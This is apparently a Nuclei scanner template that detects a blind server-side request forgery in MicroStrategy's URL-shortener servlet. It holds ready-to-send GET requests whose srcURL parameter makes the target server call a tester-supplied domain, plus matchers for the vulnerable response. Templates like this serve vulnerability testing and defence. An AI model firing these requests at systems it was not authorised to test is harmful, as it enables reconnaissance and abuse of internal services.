id: microstrategy-ssrf

info:
  name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind)
  author: organiccrap
  severity: high
  description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener.
  reference:
    - https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
  metadata:
    max-request: 2
  tags: microstrategy,ssrf

http:
  - method: GET
    path:
      - '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://{{MY-DOMAIN}}'
      - '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://{{MY-DOMAIN}}'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - taskResponse
          - The source URL is not valid
        condition: and
        part: body

# digest: 4a0a004730450220047271ca78f2a19512060e91534b177d3ebc1202ab0002365e3b1bc8d9dc14f4022100ec1b4ee4f26a42bfd7773118b11ae70445f1f3f182c1312d44ac30f50bc3eee1:922c64590222798bb761d5b6d8e72950
